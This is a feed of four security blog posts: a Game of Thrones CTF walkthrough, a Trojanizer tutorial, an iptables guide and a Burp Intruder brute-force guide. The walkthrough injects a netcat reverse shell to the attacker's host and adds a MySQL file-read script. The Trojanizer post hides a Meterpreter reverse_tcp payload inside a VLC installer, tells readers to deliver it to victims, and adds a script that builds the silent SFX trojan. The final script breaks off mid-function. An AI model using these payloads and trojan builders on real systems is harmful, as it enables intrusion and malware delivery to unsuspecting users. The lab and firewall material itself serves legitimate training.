News from 'Hacking Articles'

Raj Chandel's Blog

Hack the Game of Thrones VM (CTF Challenge)

Thu, 15/Feb/2018 - 16:04

Hello friends! Today we are going to take on another CTF challenge, Game of Thrones. The credit for making this VM goes to “OscarAkaElvis”; it is another capture-the-flag challenge in which the goal is to collect all the flags. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here it is 192.168.1.133, but you will have to find your own).

netdiscover

Use nmap for port enumeration

nmap -p- -sV 192.168.1.133

We find that port 80 is running HTTP, so we open the IP in our browser.

We take a look at the page source and find the flag syntax.

Use dirb to enumerate directories.

dirb http://192.168.1.133

We find a robots.txt file; opening it reveals a few directories.

We open the directory /secret-island/ with the User-Agent header set to Three-eyed-raven.

Inside we find a link to a map.

When we open the map we find the location of all the flags.

We open the directory /direct-access-to-kings-landing/, again with the User-Agent set to Three-eyed-raven.

In its page source we find what looks like a port-knocking sequence and a username, oberynmartell.

Using dirb we then find the /h/i/d/d/e/n/ directory and open it.

Its page source contains the password for oberynmartell.

We connect over FTP with that username and password; the first flag is shown as soon as we log in.

We find two files and download them over FTP; one of them tells us the type of hash used.

We save the hash in a file.

Now we use John the Ripper to crack the hash (a hash is recovered by guessing, not decrypted) and find the password to be stark.

john --format=dynamic_2008 hash.txt

Now we use mcrypt with that password to decrypt the encrypted file we found on the FTP server.

mcrypt -d the_wall.txt.nc

We now add the domain winterfell.7kingdoms.ctf to /etc/hosts and open the link found in the decrypted file.

We log in with the username and password and find a page with two images.

Taking a look at the page source, we find the second flag.

Along with the second flag there is a hint that one of the images contains something, so we download it and run strings on it, which reveals a domain name.

strings stark_shield.jpg

The hint is that a TXT record holds something useful, so we query the VM's DNS server for TXT records with nslookup. The domain name needed a small change to be valid; the record contains our third flag.

nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133

Now we add the new domain name to /etc/hosts and open the link found in the TXT record above.

We log in with the username and password also found in the TXT record.

We use the site's search function to look for anything exploitable.

The file manager module opens a file browser that lets us read a few files.

In the /home/aryastark folder we find a file called flag.txt.

We download the file, open it on our system and find our fourth flag.

The file also hints at a database. We know the server is running PostgreSQL, so we connect to it with the username and password given in that file.

psql -h 192.168.1.133 -U robinarryn -d mountainandthevale

We find a table called flag; it holds a base64-encoded string.

Decoding the base64 string gives our fifth flag.

We check the other tables in case we missed anything; one of them holds a few names.

SELECT * FROM arya_kill_list;

The names in arya_kill_list look useful.

Searching further through the database we find a ROT16-encoded string.

Decoding the ROT16 string gives the name of another database and a password, plus a hint that the username is one of the names from the table above.

Trying those names, we find that TheRedWomanMelisandre is the username.

In that database we find a table containing a secret flag.

From the map we know the Kingdom of the Reach is the IMAP service, so we use the port sequence found earlier to knock.

knock 192.168.1.133 3487 64535 12345

Another nmap scan shows that a new port has opened: 143, running IMAP.

nmap -p- 192.168.1.133

We connect to it with netcat and log in with the username and password from the earlier hint.

nc 192.168.1.133 143

The inbox holds our sixth flag, plus a hint to use port 1337 and a username and password to log in with.

We log in to the site on port 1337 and find that it is a Git web front end.

Browsing the repository files we find that the site is vulnerable to command injection, along with a hint to use MySQL.

We get a reverse shell by injecting a netcat command wrapped in backticks (`command`) so that the server's shell executes it.

nc -e /bin/bash 192.168.1.116 1234

We start a netcat listener on our machine first; as soon as the injected command runs we get the reverse shell.

nc -lvp 1234

Earlier, on the web page, we found a hex-encoded string; decoding it gives a file path, /home/tyrionlannister/checkpoint.txt. That file contains a username, a password and the name of the database we need to look in.

With that information we list the tables in the database.

There is a table called iron_throne, which we look inside.

It contains Morse code, which decodes to /etc/mysql/flag. Reading that path from our shell fails with file not found, and an earlier hint said we do not have enough privileges, so we check which privileges our MySQL account has.

We find that our account may import files into the database (the FILE privilege), which means the MySQL server will read the file for us with its own permissions. So first we create a table named Flag.

Then we load /etc/mysql/flag into that table.

Selecting from the table gives our seventh flag, together with a username and password for SSH.
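As an added example (not part of the original walkthrough), the following shell script does the FILE-privilege file read described above end to end: it checks the grants, then has the MySQL server load the file into a throwaway table and reads it back. The mysqld process opens the file with its own permissions, which is why a path unreadable from the web shell can still be read this way. The host, credentials and database name are placeholders to be replaced with the values from checkpoint.txt; the script assumes the mysql client is installed and that the server's secure_file_priv setting permits the path.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: read a file through
# MySQL with the FILE privilege. The mysqld process opens the file with its own
# permissions, so a path the web shell cannot read may still be readable here.
# Assumptions: host, credentials and database are placeholders (use the values
# from checkpoint.txt); the mysql client is installed; secure_file_priv on the
# server allows the path.

DB_HOST="${DB_HOST:-127.0.0.1}"
DB_USER="${DB_USER:-dbuser}"     # placeholder
DB_PASS="${DB_PASS:-dbpass}"     # placeholder
DB_NAME="${DB_NAME:-dbname}"     # placeholder

# Escape a value for use inside a single-quoted MySQL string literal.
sql_quote() {
    printf '%s' "$1" | sed "s/\\\\/\\\\\\\\/g; s/'/\\\\'/g"
}

# The statements behind "create a table, import the file, read it": one TEXT
# column, and the (line) column list so each file line lands in it whole.
# The default field separator is tab, so a line containing tabs is cut at
# the first one.
file_read_sql() {                # usage: file_read_sql /path/on/server
    path=$(sql_quote "$1")
    printf '%s\n' \
        'CREATE TABLE IF NOT EXISTS loot (line TEXT);' \
        "LOAD DATA INFILE '$path' INTO TABLE loot LINES TERMINATED BY '\n' (line);" \
        'SELECT line FROM loot;' \
        'DROP TABLE loot;'
}

# FILE is a global privilege, so it appears as FILE or ALL PRIVILEGES ON *.*
# in SHOW GRANTS output. Reads the grant lines from stdin.
grant_allows_file_read() {
    grep -Eq 'GRANT (ALL PRIVILEGES|(.*[ ,])?FILE[ ,]).*ON \*\.\* '
}

# Client wrapper; MYSQL_PWD keeps the password out of the process list.
mysql_cmd() {
    MYSQL_PWD="$DB_PASS" mysql -h "$DB_HOST" -u "$DB_USER" -N -s "$@"
}

read_file_via_mysql() {          # usage: read_file_via_mysql /etc/mysql/flag
    if ! mysql_cmd -e 'SHOW GRANTS' | grant_allows_file_read; then
        echo "read_file_via_mysql: $DB_USER lacks the FILE privilege" >&2
        return 1
    fi
    file_read_sql "$1" | mysql_cmd "$DB_NAME"
}
```

If LOAD DATA INFILE fails with an error mentioning secure_file_priv, the server restricts file reads to one directory and this route is closed regardless of the grant; LOAD_FILE() is subject to the same restriction.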

Now we use this to login through ssh.

ssh daenerystargaryen@192.168.1.133

Enumerating the system we find two files, digger.txt and checkpoint.txt. checkpoint.txt hints that we should log in over SSH to 172.25.0.2 and use digger.txt as the password list.

We copy digger.txt to our system with scp.

scp digger.txt root@192.168.1.116:

To reach 172.25.0.2 from our machine we open an SSH local port forward that maps our port 2222 to 172.25.0.2:22.

ssh daenerystargaryen@192.168.1.133 -L 2222:172.25.0.2:22 -N

Now we run hydra against the forwarded port with username root and digger.txt as the password list.

We find that the password for root is “Dr4g0nGl4ss!”.

We use it to log in over SSH, connecting to localhost on port 2222 because of the tunnel.

Enumerating the files there we find another secret flag, along with a username and password for SSH.

We use Metasploit to connect over SSH with this username and password.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133

msf auxiliary(scanner/ssh/ssh_login) > set username branstark

msf auxiliary(scanner/ssh/ssh_login) > set  password Th3_Thr33_Ey3d_Raven

msf auxiliary(scanner/ssh/ssh_login) > run

After looking for the obvious privilege escalation paths, such as setuid executables or kernel exploits, we notice that the host runs Docker. Metasploit's Docker daemon privilege escalation module works when the current user can talk to the Docker daemon (for example through membership in the docker group): it starts a container with the host filesystem mounted and uses that to run a payload as root.

msf > use exploit/linux/local/docker_daemon_privilege_escalation

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost 192.168.1.116

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1

msf exploit(linux/local/docker_daemon_privilege_escalation) >  run

We get the escalated session, and checking our id confirms we are root.

Enumerating the files we find a password-protected archive called final_battle and a file that explains how to derive the password: pseudocode that builds it from the secret flags we have collected.

So far we have two secret flags. Searching further we find that a music file also holds one: the home page served two music files, and running exiftool on the mp3 shows a secret flag in its metadata.

exiftool game_of_thrones.mp3

We implement the pseudocode in Python.

We run the program and get the password.

We extract the archive with 7z, supplying that password.

7z e final_battle

A file called flag.txt is extracted; opening it gives us the final flag.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.

The post Hack the Game of Thrones VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Bind Payload using SFX archive with Trojanizer

Wed, 14/Feb/2018 - 16:07

Trojanizer uses WinRAR to pack two user-supplied files into a self-extracting (SFX) executable archive. When the SFX archive is run it extracts and launches both files, our payload and the legitimate application, at the same time.

How to get Trojanizer?

You can clone using this Github link:

Command: git clone https://github.com/r00t-3xp10it/trojanizer.git

Before running Trojanizer we create a payload with msfvenom:

Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

Running Trojanizer

Open a terminal in the directory where you cloned the repository. There you will find Trojanizer.sh; run it with

Command: ./Trojanizer.sh

Trojanizer has some prerequisites that it tries to install on the first run. If that fails, install them manually:

Wine, WinRAR (running under Wine) and Zenity.

After loading, the tool asks whether you want to execute the framework.

Clicking Yes opens a window titled Payload to Be Compressed, where we select the payload we created with msfvenom at the start of this practical.

After selecting the payload another window opens, titled Legit Application to Trojanize.

Here we select the legitimate program (.exe) to bind with our payload. I am binding the VLC Player installer with my payload.

After clicking OK we are asked for a name for the combined file. Make it look like an installer, for example vlc-32bit-Installer or vlc-update64, or anything of your choice.

Now we select an icon for the combined file. You can choose from the default list or download an icon file (.ico) from the web.

I have downloaded the VLC icon. As you can see in the above image, I am adding the vlc-icon.ico file as the icon.

Note: because Trojanizer relies on WinRAR, the chosen icon is often not applied and the combined file shows the WinRAR SFX icon instead. This is a bug in the tool that we hope will be fixed soon.

After selecting the icon, a window shows the path of the newly created, payload-bound executable.
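For readers who want to see what the GUI steps above produce, here is an added example (not Trojanizer's own code) that builds an equivalent SFX archive directly with Rar.exe under Wine and shows the SFX script that makes the archive launch both programs. The Rar.exe path, the file names and the icon are assumptions for the example. The check at the end is the defender's view: an SFX script that starts more than one program, or runs silently from a temporary directory, is the tell-tale of this technique.

```shell
#!/bin/sh
# Added example, not Trojanizer's own code: build an SFX archive that launches
# two programs, using Rar.exe under Wine, and print the SFX script that does it.
# Assumptions: Rar.exe at the path below, payload.exe and vlc-installer.exe in
# the working directory, an icon file vlc-icon.ico.

RAR="${RAR:-$HOME/.wine/drive_c/Program Files/WinRAR/Rar.exe}"   # assumed path

# The SFX script (stored as the archive comment). Setup= lines are executed
# after extraction, in order; Silent=1 hides the extraction dialog; TempMode
# extracts into a temporary directory and removes it afterwards, so the
# victim only sees the legitimate installer starting.
sfx_script() {                 # usage: sfx_script PAYLOAD LEGIT
    printf '%s\n' \
        'TempMode' \
        'Silent=1' \
        'Overwrite=1' \
        "Setup=$1" \
        "Setup=$2"
}

# Pack both files into a self-extracting .exe with the script and icon applied.
# -sfx selects the SFX module, -z reads the script from a file, -iicon sets
# the icon of the resulting executable. The script file is created in the
# working directory so the Windows program under Wine can open it.
build_sfx() {                  # usage: build_sfx PAYLOAD LEGIT OUT.exe ICON.ico
    script=$(mktemp ./sfx.XXXXXX)
    sfx_script "$1" "$2" > "$script"
    wine "$RAR" a -sfx -z"$script" -iicon"$4" "$3" "$1" "$2"
    status=$?
    rm -f "$script"
    return $status
}

# Defender's side: returns 0 if the SFX script in the given file launches more
# than one program, or launches silently from a temporary directory.
sfx_script_suspicious() {      # usage: sfx_script_suspicious SCRIPTFILE
    setups=$(grep -c '^Setup=' "$1" || true)
    [ "$setups" -gt 1 ] && return 0
    grep -q '^Silent=1' "$1" && grep -q '^TempMode' "$1"
}
```

Usage: build_sfx payload.exe vlc-installer.exe vlc-update64.exe vlc-icon.ico. WinRAR displays the SFX script of any self-extracting archive it opens, which is where a reviewer can read the Setup= lines without running the file.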

Now start a listener on the lhost and lport we gave msfvenom earlier. Open the Metasploit Framework and type

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.111

msf exploit(multi/handler) > set lport 4466

msf exploit(multi/handler) > run

Now deliver the trojanized file to the victim by whatever means you choose.

When the user opens the file, the usual security warning for an unsigned executable is shown, nothing out of the ordinary.

After clicking Run the user sees the VLC installer start and has no reason to be suspicious.

But at the same moment we get a Meterpreter session, as shown below. Keep in mind that a plain, unencoded msfvenom payload like this one is detected by most antivirus products, so outside a lab the payload itself needs additional evasion before this technique works.

That is how we bind a payload to any legitimate program (.exe) with Trojanizer.

Author: Sanjeet Kumar is an Information Security Analyst, Pentester and Researcher.

The post Bind Payload using SFX archive with Trojanizer appeared first on Hacking Articles.


Beginner Guide to IPtables

Fri, 09/Feb/2018 - 22:18

Hello friends!! In this article we discuss iptables and its uses. iptables is the command-line tool for the Linux kernel's packet filter (netfilter), installed by default on all official Ubuntu releases. With iptables you define a set of rules that the kernel evaluates in order against all incoming and outgoing traffic.

Today we look at basic iptables concepts and use its options to populate the filter table, which filters incoming and outgoing traffic.

Basic Iptables Options

-A: Append this rule to the end of a chain.

-L: List the current filter rules.

-m conntrack: Allow filter rules to match based on connection state. Permits the use of the --ctstate option.

--ctstate: Define the list of states for the rule to match on. Valid states are:

  • NEW – The connection has not yet been seen.
  • RELATED – The connection is new, but is related to another connection already permitted.
  • ESTABLISHED – The connection is already established.
  • INVALID – The traffic couldn’t be identified for some reason.

-m limit: Require the rule to match only a limited number of times. Allows the use of the --limit option.

Useful for limiting logging rules:

  • --limit – The maximum matching rate, given as a number followed by “/second”, “/minute”, “/hour”, or “/day” depending on how often you want the rule to match. If -m limit is used without this option, the default is “3/hour”.

-p: The protocol to match (tcp, udp, icmp, or all).

--dport: The destination port(s) required for this rule. A single port may be given, or a range may be given as start:end, which matches all ports from start to end, inclusive.

-j: Jump to the specified target. The basic built-in targets are:

  • ACCEPT – Accept the packet and stop processing rules in this chain.
  • REJECT – Reject the packet, notify the sender that we did so, and stop processing rules in this chain.
  • DROP – Silently discard the packet, and stop processing rules in this chain.
  • LOG – Log the packet to the kernel log and continue with the next rule in the chain. LOG does not terminate processing, so it is normally placed right before the DROP or REJECT rule it documents.

-I: Insert a rule. Takes two arguments, the chain to insert the rule into and the position it should have: -I INPUT 5 would insert the rule into the INPUT chain and make it the 5th rule in the list.

-s, --source address[/mask]: Source specification.

-d, --destination address[/mask]: Destination specification.

iptables organizes its rules into chains: ordered lists of firewall rules that control incoming and outgoing traffic (ipchains was the older tool that iptables replaced).

Three important iptables chains

INPUT chain: rules in the INPUT chain apply to incoming traffic addressed to the server itself.

OUTPUT chain: rules in the OUTPUT chain apply to outgoing traffic generated by the server.

FORWARD chain: rules in the FORWARD chain apply to packets routed through the server. This is used when a Linux machine acts as a router connecting two networks.

As described above, iptables is installed by default on Ubuntu, but if it is missing on another Linux system you can install it with the command below.

sudo apt-get install iptables

By default the chains are empty and their policy is ACCEPT, so all incoming and outgoing traffic passes without filtering. To view the rules currently loaded, run the following command, which lists any rules that have been added.

sudo iptables -L -v

Here -L lists the rules of each chain and -v adds packet and byte counters and the interfaces involved.

Allow Incoming Traffic

To allow traffic on a particular port, use the commands below; here we accept incoming connections on port 22 for SSH, 80 for HTTP and 443 for HTTPS.

sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT

This allows TCP connections arriving on ports 22, 80 and 443. Note that these ACCEPT rules only make a difference when something else would block the traffic: with the default INPUT policy of ACCEPT they change nothing. They matter once the chain policy is set to DROP (with the -P option) or a catch-all DROP rule is appended after them; when you do that over SSH, make sure the rule for port 22 is in place first so you do not lock yourself out.

Drop/Deny Incoming Traffic

To deny traffic on a particular port, use the commands below; here we drop incoming connections on port 21 for FTP and 23 for Telnet.

sudo iptables -A INPUT -p tcp --dport 21 -j DROP

sudo iptables -A INPUT -p tcp --dport 23 -j DROP

TCP connections to ports 21 and 23 are now discarded silently; the client gets no reply and eventually reports a timeout.

Reject Incoming Traffic

REJECT and DROP both prevent the connection; the difference is that REJECT sends an error back to the sender (by default an ICMP port-unreachable message) before discarding the packet, so the client fails immediately instead of waiting for a timeout. For TCP, --reject-with tcp-reset makes the port look closed rather than filtered. The command below rejects incoming traffic on port 25 (SMTP).

sudo iptables -A INPUT -p tcp --dport 25 -j REJECT

Connections to port 25 now fail at once with a destination port unreachable error.

Allow Incoming Traffic from Specific IP

To allow all traffic from a particular IP address, for example a trusted client, run:

sudo iptables -A INPUT -s 192.168.1.104 -j ACCEPT

This accepts packets from the host 192.168.1.104 (a single address; a /mask suffix would match a whole network).

Block Specific Network IP

To block all traffic from a particular IP address, for example an attacker's, run:

sudo iptables -A INPUT -s 192.168.1.102 -j DROP

This drops packets from the host 192.168.1.102.

Block Specific Network Interface

To restrict a rule to a specific network interface, for example eth0, add -i; the command below drops incoming traffic from 10.10.10.10 only when it arrives on eth0.

sudo iptables -A INPUT -i eth0 -s 10.10.10.10 -j DROP

Replace -j DROP with -j ACCEPT to allow traffic on a particular interface instead.

Block Specific IP Range

To block a range of IP addresses, use the iprange match. The command below drops incoming packets from 192.168.1.100 through 192.168.1.200.

sudo iptables -A INPUT -m iprange --src-range 192.168.1.100-192.168.1.200 -j DROP

Replace -j DROP with -j ACCEPT to allow traffic from a particular IP range instead.

Block Specific Mac Address

To block a specific MAC address, use the mac match. The command below drops incoming packets from the given MAC address (the attacker's machine). This only works for hosts on the same layer-2 segment, since the source MAC is rewritten at every router hop, and a MAC address is trivially spoofed.

sudo iptables -A INPUT -m mac --mac-source FC:AA:14:6A:9A:A2 -j DROP

Replace -j DROP with -j ACCEPT to allow traffic from a particular MAC address instead.

Block Ping Request

Administrators often block ping requests, with either DROP or REJECT, so the host does not answer simple reachability probes. Here we block them with DROP. Note that the command below drops all ICMP arriving on eth0, not just echo requests; to drop only pings add --icmp-type echo-request, because discarding every ICMP type also breaks path MTU discovery and other error reporting.

sudo iptables -A INPUT -p icmp -i eth0 -j DROP
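Putting the rules above together, here is an added example (not from the original article) of a complete INPUT ruleset in iptables-restore format, with the checks the individual commands above omit: established connections are accepted first, the default policy is DROP so the ACCEPT rules actually matter, ping is rate-limited rather than dropping all of ICMP, and the whole table is loaded atomically. The management network, interface and service ports are assumptions for the example.

```shell
#!/bin/sh
# Added example, not from the original article: a complete INPUT ruleset in
# iptables-restore format. Assumptions: admin network 192.168.1.0/24, interface
# eth0, services on 22/80/443. Generating needs no privileges; applying does.

MGMT_NET="${MGMT_NET:-192.168.1.0/24}"     # assumed admin network
ALLOWED_TCP="${ALLOWED_TCP:-22 80 443}"    # assumed services

# Print the ruleset. Order matters: traffic belonging to established
# connections is accepted first, then loopback, then the chosen services;
# whatever is left is logged (rate limited) and dropped by the chain policy.
build_ruleset() {
    printf '%s\n' '*filter'
    printf '%s\n' ':INPUT DROP [0:0]'      # policy DROP is what gives the ACCEPT rules meaning
    printf '%s\n' ':FORWARD DROP [0:0]'
    printf '%s\n' ':OUTPUT ACCEPT [0:0]'
    printf '%s\n' '-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT'
    printf '%s\n' '-A INPUT -m conntrack --ctstate INVALID -j DROP'
    printf '%s\n' '-A INPUT -i lo -j ACCEPT'
    # Rate-limit ping instead of dropping all ICMP; ICMP errors tied to our
    # own connections already pass as RELATED above.
    printf '%s\n' '-A INPUT -p icmp --icmp-type echo-request -m limit --limit 5/second -j ACCEPT'
    # SSH only from the admin network, listed before the other services so
    # that loading the ruleset over SSH cannot lock us out.
    printf '%s\n' "-A INPUT -i eth0 -p tcp --dport 22 -s $MGMT_NET -m conntrack --ctstate NEW -j ACCEPT"
    for port in $ALLOWED_TCP; do
        [ "$port" = 22 ] && continue
        printf '%s\n' "-A INPUT -p tcp --dport $port -m conntrack --ctstate NEW -j ACCEPT"
    done
    # LOG does not terminate; the chain policy drops the packet afterwards.
    printf '%s\n' '-A INPUT -m limit --limit 5/minute -j LOG --log-prefix "iptables-drop: "'
    printf '%s\n' 'COMMIT'
}

# Number of rules in the INPUT chain, for a sanity check before applying.
count_input_rules() {
    build_ruleset | grep -c '^-A INPUT'
}

# Returns 0 if the ESTABLISHED,RELATED rule precedes the first port rule;
# omitting or misplacing it is the classic mistake in hand-written rulesets.
conntrack_rule_first() {
    build_ruleset | awk '
        /^-A INPUT/ { n++ }
        /ctstate ESTABLISHED/ && !e { e = n }
        /--dport/ && !d { d = n }
        END { exit !(e && d && e < d) }'
}

# Load the whole table in one step: a sequence of -A commands that fails half
# way leaves a partial ruleset, while iptables-restore applies all or nothing.
apply_ruleset() {
    if [ "$(id -u)" -ne 0 ]; then
        echo 'apply_ruleset: run as root' >&2
        return 1
    fi
    build_ruleset | iptables-restore
}
```

Run build_ruleset to review the output, then apply_ruleset as root; iptables-save afterwards shows the loaded table in the same format, which is also the form to persist across reboots.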

View List of Applied Chain rules

To view the chain rules we have applied, run the command below again; it dumps the current iptables rules.

sudo iptables -L

In the listing below you can observe five columns containing the records of the rules.

These columns hold the following information:

target: the action applied

prot: the protocol, such as tcp, icmp, udp or all

opt: per-rule options; blank here

source: the source address of matching traffic

destination: the destination address (the host that receives the packet)

Now if someone pings the server, as shown in the image below, they see “Request timed out”, which means the server has dropped the ICMP request packets.

Deleting Any Rule

To delete a rule from the filter table, use -D with the chain name and the rule number (list the chain with -L --line-numbers to see the numbers). We remove our last rule, the ICMP drop, which was number 12 in our list.

sudo iptables -D INPUT 12

Replace 12 with the number of whichever rule you wish to remove.

Listing the chain again with -L shows that it now holds only 11 rules and the ICMP drop rule is gone.

Flush IPtables

To remove the entire set of rules, flush the table with -F:

sudo iptables -F

Listing the rules once more now shows an empty table, as in the image below. Note that -F only deletes rules; it does not reset chain policies set with -P, so flushing a chain whose policy is DROP leaves all traffic blocked.

Source: https://help.ubuntu.com/community/IptablesHowTo

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadgets enthusiast.

The post Beginner Guide to IPtables appeared first on Hacking Articles.


Payload Processing Rule in Burp suite (Part 2)

Tue, 06/Feb/2018 - 18:15

Hello friends!! Today we discuss the Payload Encoding option and the remaining payload processing rules of Burp Suite: advanced options under the Intruder tab for shaping the payloads used in a brute-force attack.

Payload Encode

This processing rule encodes the payload using one of several schemes: URL, HTML, Base64, ASCII hex, or constructed strings for various platforms.

Let’s start!!

First, we intercept the request of the router's login page, reached through its default IP 192.168.1.1, after entering an invalid username and password. When we click Login, Burp Suite captures the request in the Intercept tab.

The captured request can be seen in the image below. The last line, highlighted in the screenshot, is the Authorization header: it shows that the router uses HTTP Basic authentication, which, as described in the earlier part on basic authentication, sends username:password base64-encoded in every request.

Send the captured request to Intruder by clicking on the Action tab and follow the steps below. Open the Intruder tab, then the Positions tab, where the encoded credential is highlighted; select the payload position as follows.

  • Press the Clear button at the right of the window frame.
  • Select the encoded authentication value as the payload position and click the Add button at the left of the frame.
  • Choose the Attack type as

Now click on the Payloads option. Select the payload type Simple list and load a dictionary with the Load button; you can either load a dictionary or add input strings manually with the Add button, as shown in the image.

The base64-encoded authentication value is the combination username:password, so the plan is to generate the same encoded value from a dictionary of username:password pairs; that is the dictionary we made.

Before starting the attack we add a payload processing rule of type Encode and select the “Base64 encode” scheme, because the router expects the value in Base64.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax while the brute-force attack runs, trying each encoded string against the authentication. In the screenshot the status code and response length of request 10 differ from the rest of the values, which means that encoded value was accepted and the tenth line of the dictionary holds the valid username and password.

To confirm, we enter the username and password on the router's login page, which logs us into the router's configuration page. This shows the success of the attack, as shown in the image.

Decode

This processing rule decodes the payload using one of the schemes URL, HTML, Base64 or ASCII hex. Decoding simply reverses the corresponding encoding, so it is used in the opposite situation: when the dictionary holds encoded values and the application expects the plain form.

Hash

This processing rule applies a hashing function to the payload. Seven hashing algorithms are available:

  • SHA-384
  • SHA-224
  • SHA-256
  • MD5
  • MD2
  • SHA (SHA-1)
  • SHA-512

First, in a lab of our own, built to find redirection vulnerabilities, we intercept the request made by the Redirection link. The redirect page takes the MD5 hash of the target URL as a parameter; we replace the correct hash, that of HTTP://www.hackingarticles.in, with the hash of HTTP://www.google.com. Clicking the Redirection link, as shown in the image, makes Burp Suite capture the request of the redirecting page in the Intercept tab.

Send the captured request to Intruder by clicking on the Action tab and follow the steps below. Open the Intruder tab, then the Positions tab, where the hash parameter is highlighted; select the payload position as follows.

  • Press the Clear button at the right of the window frame.
  • Select the field to attack, the hash value of the redirecting page, and click the Add button.
  • Choose the Attack type as Sniper.

Then select the payload type Simple list and load a dictionary with the Load button; you can either load a dictionary or add input strings manually with the Add button, as shown in the image.

Before starting the attack we add a payload processing rule of type Hash and select MD5, the algorithm the page uses to turn the target URL into a hash. The dictionary entries are plain URLs, but this rule converts each one into its MD5 value, which can be seen in the results window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax while Burp Suite hashes each URL and submits it; the entry whose MD5 matches the one the redirecting page expects produces a response of a different length, as shown in the image.

Supplying that MD5 value in the URL of the redirecting page now redirects us to HTTP://www.hackingarticles.in, confirming the success of the attack, as shown in the image.

Add Raw Payload

This processing rule adds the raw payload value before or after the current processed value. It comes in handy, for example, when we want to submit the same payload in both raw and hashed form.

First, we intercept the request of the login page in the bWAPP lab, where we enter the default username and a wrong password. When we click Login, Burp Suite captures the request in the Intercept tab.

Send the captured request to Intruder by right-clicking in the request and selecting Send to Intruder, or simply press Ctrl+I. Open the Intruder tab, then the Positions tab, where the password is highlighted, and select the payload position as follows.

  • Press the Clear button at the right of the window frame.
  • Select the field to attack, the password field, and click the Add button.
  • Choose the Attack type as Sniper.
  • In the image below we have selected only the password, so we need one dictionary file, for passwords.

Before starting the attack we add a payload processing rule of type Add Raw Payload and select Append Pre-processed Payload. This appends the unprocessed payload after the current processed value; since no other rule runs first, every dictionary entry is sent doubled (an entry abc becomes abcabc), as can be seen in the results window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax while Burp Suite tries each password; the moment it finds the correct value, the response length changes, as shown in the image.

To confirm the password, we enter it on the bWAPP login page, which logs us into the lab. This shows the success of the attack, as shown in the image.

Skip if Matches Regex

This processing rule checks whether the current processed value matches a specified regular expression and, if it does, skips that payload and moves on to the next one. For example, suppose a parameter has a minimum length and we want to skip dictionary values shorter than that minimum.

First, we intercept the request of the login page in the bWAPP lab, where we enter the default username and a wrong password. When we click Login, Burp Suite captures the request in the Intercept tab.

Send the captured request to Intruder by clicking on the Action tab and follow the steps below. Open the Intruder tab, then the Positions tab, where the password is highlighted, and select the payload position as follows.

  • Press the Clear button at the right of the window frame.
  • Select the field to attack, the password field, and click the Add button.
  • Choose the Attack type as
  • In the image below we have selected only the password, so we need one dictionary file, for passwords.

Then select the payload type Simple list and load a dictionary with the Load button; you can either load a dictionary or add input strings manually with the Add button, as shown in the image.

Before starting the attack we add a payload processing rule of type Skip if Matches Regex with {@} in the match regex field. Under this rule any dictionary entry that matches the expression is skipped and the attack moves on to the next one.

Now select Start Attack in the Intruder menu as shown in the image.

Sit back and relax while Burp Suite tries each remaining password; the moment it finds the correct value, the response length changes, as shown in the image.
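As an added example (not from the original post), the shell functions below reproduce the three processing rules used in this post, Skip if Matches Regex, Encode/Base64 and Hash/MD5, so you can check offline what Intruder will send and which dictionary line produced the accepted value. The dictionary, the captured Authorization value and the MD5 of the redirect target used in demo() are constructed for the example; in a real test they come from the intercepted request.

```shell
#!/bin/sh
# Added example, not from the original post: the Skip if Matches Regex,
# Encode/Base64 and Hash/MD5 processing rules reproduced in the shell.
# The dictionary, the Authorization value and the redirect hash in demo()
# are constructed for this example; real ones come from the captured request.

# Skip if matches regex: drop dictionary lines matching an extended regex,
# e.g. '^.{0,5}$' removes candidates shorter than six characters.
skip_if_matches() {            # usage: skip_if_matches REGEX < list
    grep -Ev -e "$1" || true   # grep exits 1 when nothing survives
}

# Encode/Base64 on a "user:pass" payload: the value that follows
# "Authorization: Basic " in an HTTP Basic authentication request.
encode_basic_auth() {          # usage: encode_basic_auth USER PASS
    printf '%s:%s' "$1" "$2" | base64 | tr -d '\n'
}

decode_basic_auth() {          # usage: decode_basic_auth B64
    printf '%s' "$1" | base64 -d
}

# Hash/MD5 on a payload: hash the bytes only, no trailing newline (echo
# would add one and change the digest, the usual cause of "no match").
md5_payload() {                # usage: md5_payload STRING
    printf '%s' "$1" | md5sum | cut -d ' ' -f 1
}

# Walk the dictionary as a Sniper attack does and print the first user:pass
# line whose encoded form equals the accepted value. The optional REGEX is
# applied as a skip rule first. Returns 1 when nothing matches.
find_basic_auth_match() {      # usage: find_basic_auth_match DICT B64 [REGEX]
    regex=$3
    [ -n "$regex" ] || regex='^$'
    skip_if_matches "$regex" < "$1" | {
        while IFS=: read -r user pass; do
            if [ "$(encode_basic_auth "$user" "$pass")" = "$2" ]; then
                printf '%s:%s\n' "$user" "$pass"
                exit 0
            fi
        done
        exit 1
    }
}

# Same for the redirect page: which URL in the list hashes to the MD5 the
# application trusts?
find_md5_match() {             # usage: find_md5_match LIST MD5
    skip_if_matches '^$' < "$1" | {
        while read -r url; do
            if [ "$(md5_payload "$url")" = "$2" ]; then
                printf '%s\n' "$url"
                exit 0
            fi
        done
        exit 1
    }
}

demo() {
    dict=$(mktemp)
    printf '%s\n' 'admin:1234' 'admin:password' 'admin:admin' > "$dict"
    # Constructed header value: base64 of "admin:admin". The regex skips
    # entries of ten characters or fewer, so admin:1234 is never sent.
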